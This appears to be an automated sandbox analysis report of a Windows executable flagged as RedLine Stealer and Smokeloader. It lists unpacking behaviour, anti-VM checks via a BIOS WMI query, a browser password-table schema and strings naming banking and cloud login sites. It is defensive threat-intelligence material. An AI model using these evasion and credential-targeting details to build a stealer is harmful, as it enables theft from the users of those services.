Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B64B7	0_2_009B64B7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009CD4D7	0_2_009CD4D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009DB427	0_2_009DB427
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009C144C	0_2_009C144C
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009E6447	0_2_009E6447
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B45D7	0_2_009B45D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009CC528	0_2_009CC528
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009ED557	0_2_009ED557
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009C9541	0_2_009C9541
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009D9611	0_2_009D9611
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009E9607	0_2_009E9607
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009C87DF	0_2_009C87DF
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009DD7E5	0_2_009DD7E5
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009ED7E7	0_2_009ED7E7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B7717	0_2_009B7717
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009DB763	0_2_009DB763
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009E5897	0_2_009E5897
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009E4891	0_2_009E4891
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009DC8B1	0_2_009DC8B1
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009D0817	0_2_009D0817
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009CD847	0_2_009CD847
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009DB75E	0_2_009DB75E
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009DC99C	0_2_009DC99C
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009DC98D	0_2_009DC98D
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009C99D7	0_2_009C99D7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B89F7	0_2_009B89F7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009CC921	0_2_009CC921
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009DC94B	0_2_009DC94B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B6947	0_2_009B6947
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B9967	0_2_009B9967
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009EDA97	0_2_009EDA97
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009E9A97	0_2_009E9A97
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009E5AF7	0_2_009E5AF7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009C7BA7	0_2_009C7BA7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009BABA7	0_2_009BABA7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009D5BF7	0_2_009D5BF7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009BCB7E	0_2_009BCB7E
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009D3C9B	0_2_009D3C9B
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009D4CF4	0_2_009D4CF4
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009EBC08	0_2_009EBC08
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B3C27	0_2_009B3C27
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B5C57	0_2_009B5C57
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009CDC47	0_2_009CDC47
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009BFC64	0_2_009BFC64
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B2E37	0_2_009B2E37
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009E6E67	0_2_009E6E67
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009BDF8C	0_2_009BDF8C
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009CDFB7	0_2_009CDFB7
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009B4F17	0_2_009B4F17
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009C8F35	0_2_009C8F35
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009D1F77	0_2_009D1F77

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: String function: 009C42C7 appears 74 times
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: String function: 009B81D7 appears 78 times
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: String function: 00414060 appears 74 times
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: String function: 00407F70 appears 46 times

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1884

Source: H1iOI9vWfh.exe

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: H1iOI9vWfh.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2615507633.0000000000BCA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: H1iOI9vWfh.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@10/2

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Code function: 0_2_00BCB5D6 CreateToolhelp32Snapshot,Module32First,

0_2_00BCB5D6

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Code function: 0_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_004361E0

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7024

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\94de34e2-8543-4084-9954-f260de7e13c0

Jump to behavior

Source: H1iOI9vWfh.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: H1iOI9vWfh.exe, 00000000.00000003.2433309452.000000000307F000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2457034647.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2433156791.000000000309B000.00000004.00000800.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000003.2457150793.000000000309F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: H1iOI9vWfh.exe	Virustotal: Detection: 36%
Source: H1iOI9vWfh.exe	ReversingLabs: Detection: 47%

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

File read: C:\Users\user\Desktop\H1iOI9vWfh.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\H1iOI9vWfh.exe "C:\Users\user\Desktop\H1iOI9vWfh.exe"
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1884

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Unpacked PE file: 0.2.H1iOI9vWfh.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

Unpacked PE file: 0.2.H1iOI9vWfh.exe.400000.0.unpack

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043F83E push es; retf	0_2_0043F83F
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0041ACF6 push esp; iretd	0_2_0041ACFF
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00444520 push ebp; ret	0_2_00444522
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_0043BF00 push eax; mov dword ptr [esp], 49484716h	0_2_0043BF01
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009EC167 push eax; mov dword ptr [esp], 49484716h	0_2_009EC168
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009EF6A5 push es; retf	0_2_009EF6A6
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_009CAF5D push esp; iretd	0_2_009CAF66
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00BCE025 pushad ; ret	0_2_00BCE02A
Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Code function: 0_2_00BCE2AB push ebp; ret	0_2_00BCE2B0

Source: H1iOI9vWfh.exe

Static PE information: section name: .text entropy: 7.375070698594339

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe TID: 7120

Thread sleep time: -210000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\H1iOI9vWfh.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696508427
Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696508427s
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696508427f
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696508427
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427x
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696508427
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696508427}
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696508427t
Source: H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, H1iOI9vWfh.exe, 00000000.00000002.2615530921.0000000000C06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696508427\|UE
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696508427x
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696508427}
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696508427h
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696508427
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 27 6e d0 59 6b 97 52-b4 9a 7f 42 1f 0e 66 9c
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696508427j
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696508427
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030D2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696508427p
Source: H1iOI9vWfh.exe, 00000000.00000003.2456608650.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
